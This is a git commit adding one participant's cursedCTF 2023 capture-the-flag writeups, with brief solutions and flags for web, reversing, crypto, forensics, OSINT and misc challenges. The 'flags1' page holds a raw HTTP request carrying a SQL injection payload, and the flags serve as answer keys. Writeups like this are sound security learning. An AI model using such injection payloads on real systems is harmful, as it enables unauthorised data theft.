feat: added cursedCTF

pull/1/head
Muhammad Daffa 2023-04-11 07:15:08 +07:00
parent 524bacdcc2
commit fd91dd3fa8
36 changed files with 305 additions and 1 deletions

View File

@ -37,3 +37,6 @@ List of CTF events that i have joined before
| VishwaCTF 2023 | 31 March, 17:30 WIB — 02 April 2023, 17:30 WIB | [Link](/VishwaCTF%202023/) | | VishwaCTF 2023 | 31 March, 17:30 WIB — 02 April 2023, 17:30 WIB | [Link](/VishwaCTF%202023/) |
| RITSEC CTF 2023 | 31 March, 23:00 WIB — 02 April 2023, 23:00 WIB | [Link](/RITSEC%20CTF%202023/) | | RITSEC CTF 2023 | 31 March, 23:00 WIB — 02 April 2023, 23:00 WIB | [Link](/RITSEC%20CTF%202023/) |
| GREP CTF 2023 | 01 April, 18:00 WIB — 03 April 2023, 18:00 WIB | [Link](/GREP%20CTF%202023/) | | GREP CTF 2023 | 01 April, 18:00 WIB — 03 April 2023, 18:00 WIB | [Link](/GREP%20CTF%202023/) |
| Midnight Sun CTF 2023 Quals | 08 April, 18:00 WIB — 09 April 2023, 18:00 WIB | [Link](/Midnight%20Sun%20CTF%202023%20Quals/) |
| Bucket CTF 2023 | 08 April, 00:00 WIB — 10 April 2023, 00:00 WIB | [Link](/Midnight%20Sun%20CTF%202023%20Quals/) |
| cursedCTF 2023 | 08 April, 07:00 WIB — 11 April 2023, 07:00 WIB | [Link](/cursedCTF%202023/) |

View File

@ -0,0 +1,16 @@
# Insanity Check
> Hello and welcome to cursed ctf for real. glad you read the rules lets go.
## About the Challenge
We have been given a server to connect and we need to find the `sanity check` flag from each CTF competition
![preview](images/preview.png)
## How to Solve?
To solve this chall, you need to find the information about some CTF competition. For example `Plaid CTF 2014:`, I can get information about the flag using `ctftime` or you can search it in Github or you can find the flag by reading someone's writeup
![flag](images/flag.png)
```
cursed{w3lc0m3_t0_th3_sh1tsh0w!}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 113 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 11 KiB

View File

@ -0,0 +1,14 @@
# LiNkIdEn
> Add me on linkedIn for a flag
> https://www.linkedin.com/in/emma-reuter/
## About the Challenge
We need to connect to `Emma Reuter` LinkedIn account to get the flag
## How to Solve?
Simply connect with her, and you will receive a message containing the flag.
```
cursed{linkedin}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 44 KiB

19
cursedCTF 2023/README.md Normal file
View File

@ -0,0 +1,19 @@
# cursedCTF 2023
CTF writeup for The cursedCTF 2023. I took part in this CTF competition with the TCP1P team, and got 47th place out of 568 teams
Thanks to the team especially @dRe
| Category | Challenge |
| --- | --- |
| Web | [flags1](/cursedCTF%202023/flags1/)
| Reverse | [pirates-and-cursed-flags](/cursedCTF%202023/pirates-and-cursed-flags/)
| Crypto | [find the paper](/cursedCTF%202023/find%20the%20paper/)
| Forensics | [cyber cat](/cursedCTF%202023/cyber%20cat/)
| Osnit | [Scents!](/cursedCTF%202023/Scents!/)
| Osnit | [Scents^2](/cursedCTF%202023/Scents%5E2/)
| Other | [four](/cursedCTF%202023/four/)
| Other | [LiNkIdEn](/cursedCTF%202023/LiNkIdEn/)
| Misc | [hoarder](/cursedCTF%202023/hoarder/)
| Misc | [survey](/cursedCTF%202023/survey/)
| Misc | [Insanity Check](/cursedCTF%202023/Insanity%20Check/)
| Misc | [\"seduce me!\"](/cursedCTF%202023/seduce%20me!/)

View File

@ -0,0 +1,20 @@
# Scents!
> What's the name of this cent
![notes](notes.png)
## About the Challenge
We have received a notes / ingredient, and we need to find the name of the perfume
## How to Solve?
Go to Google and enter the notes / ingredient to find the name of the perfume
```
"Watery Notes" "Blackcurrant Syrup" "Pink Pepper"
```
![flag](images/flag.png)
```
cursed{kamuthraa}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 79 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 103 KiB

View File

@ -0,0 +1,27 @@
# Scents^2
> What's the common notes for all of these scents?
![scents](scents.png)
## About the Challenge
We have received a list of perfumes, and we need to find the correct ingredient / notes
## How to Solve?
Im using this [website](https://www.fragrantica.com/ingredients-search/) to find the correct notes. And then I tried to search each perfume and here is the list
* https://www.fragrantica.com/perfume/Al-Rehab/Classic-20062.html
* https://www.fragrantica.com/perfume/Lazure-Perfumes/Sunset-Bay-75321.html
* https://www.fragrantica.com/perfume/Ineke/Chemical-Bonding-4070.html
* https://www.fragrantica.com/perfume/Torrente/L-Or-Rouge-2468.html
* https://www.fragrantica.com/perfume/Birkholz/Velvet-Orchid-59877.html
* https://www.fragrantica.com/perfume/Natura/Esta-Flor-Lavanda-58164.html
* https://www.fragrantica.com/perfume/Gres/Cabochard-Apaiser-Vert-35966.html
* https://www.fragrantica.com/perfume/Berceuse-Parfum/Minneapolis-5-3-75704.html
Scroll down a little bit, and you will find the perfumes notes. Find the same ingredients in all perfumes, for example, `amber` and `citruses`. And then input all the ingredients on the ingredient searcher
![flag](images/flag.png)
```
cursed{amber,citruses,musk,powdery notes}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 90 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 178 KiB

View File

@ -0,0 +1,20 @@
# cyber cat
> i've hidden a flag in this picture of my cat
## About the Challenge
We have been given an image (You can downlod the file [here](cyber_cat.png)) and we need to find the flag inside that image
## How to Solve?
To solve this chall, im using `strings` and `grep`. Here is the command that I used
```shell
strings cyber_cat.png | grep "cursed{"
```
This command is using the strings command to extract human-readable strings from the file `cyber_cat.png`. Then, it uses the grep command to search for the string `cursed{` in the output of the strings command.
![flag](images/flag.png)
```
cursed{lmao}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 11 KiB

View File

@ -0,0 +1,22 @@
# find the paper
> here is a screenshot from a paper
![paper](cursedctf.png)
> here is a screenshot from a paper picture from a paper the flag format is cursed{last name 1, last name 2, ..., last name n}
## About the Challenge
We need to find the author of the paper
## How to Solve?
At first, im using google reverse image and I found this medium post
![blog](images/blog.png)
I opened the blog and found that the screenshot was from a paper titled [Post-quantum RSA](https://cr.yp.to/papers/pqrsa-20170419.pdf).
![paper](images/paper.png)
```
cursed{Lou, Heninger, Bernstein, Valenta}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 75 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 57 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 108 KiB

View File

@ -0,0 +1,34 @@
# flags1
> Come submit your flags for all to see!
## About the Challenge
We have been given a website and we need to find the flag there
![preview](images/preview.png)
We can input some random string and then our input will be displayed in the homepage
## How to Solve?
Actually this chall is literally the same with `UTCTF - Confessions` chall. So i tried to use the same payload to solved this chall
```
POST /sendflag HTTP/2
Host: flags.mc.ax
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
flag="); SELECT text FROM confessions; --
```
![flag](images/flag.png)
If you are still confused, you can refer to this [repository](https://github.com/utisss/UTCTF-23/tree/main/guppy/web-confession)
```
cursed{thank_you_for_the_flags}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 361 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 41 KiB

View File

@ -0,0 +1,14 @@
# four
> four
## About the Challenge
`-`
## How to Solve?
At first, I was really confused because the description was only `four.` However, while searching for 'cursed{' on the Discord server, I found out that one of the admins had used the flag as their username.
![flag](images/flag.png)
```
cursed{todo-share-this-flag}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 142 KiB

View File

@ -0,0 +1,12 @@
# hoarder
> Here is the flag cursed{hoarding_is_a_legitimate_strategy}. I would think twice before submitting it, maybe read the source to cursed-rctf or something.
## About the Challenge
`-`
## How to Solve?
Well, just the flag is already in the description.
```
cursed{hoarding_is_a_legitimate_strategy}
```

View File

@ -0,0 +1,18 @@
# pirates-and-cursed-flags
> Please don't steal our book. Only authorized users can open this.
## About the Challenge
We have been given a html file (You can download the file [here](book.html)) and we need to find the flag there
## How to Solve?
If you check the source code of the website, we know the pin is `hunter2`
![code](images/code.png)
Now input `hunter2` in the form and we will obtain the flag
![flag](images/flag.png)
```
cursedflag{did_you_know_that_hacking_is_illegal}
```

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 11 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 35 KiB

View File

@ -0,0 +1,16 @@
# \"seduce me!\"
> \"I am not one of your fried chicken tramps!\"
> Convince me to give you the flag. My Discord username is rosecourts#9323. My email is rosecourts2048@gmail.com. Contacting me via any other means is out of scope.
## About the Challenge
We need to contact the admin using discord / email to obtain the flag
## How to Solve?
In this case I contacted the admin using email and then the admin will give you the flag
![flag](images/flag.png)
```
cursed{Case-the-restaurant-run-background-checks-on-the-staff.Can-the-cook-be-trusted?If-not-I-gotta-kill-him.Dispose-of-the-body-replace-him-with-my-own-guy-no-later-than-4:30.}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 44 KiB

View File

@ -0,0 +1,20 @@
# survey
> Please complete the survey. `nc mc.ax 31499`
## About the Challenge
We have been given a server to connect and we need to solve the pow to know the next step
![preview](images/preview.png)
## How to Solve?
At first, I thought i can solve the `pow` by running command `nc mc.ax 31501`. But I was completely wrong, that server is a minecraft server and to obtain the flag we need to play minecraft and got `1 gold` first. And then use the minecraft console to get the ticket
![survey](images/survey.png)
Check the survey link, and you will find the flag in the google form
![flag](images/flag.png)
```
cursed{i-love-cursedctf}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 11 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 21 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 46 KiB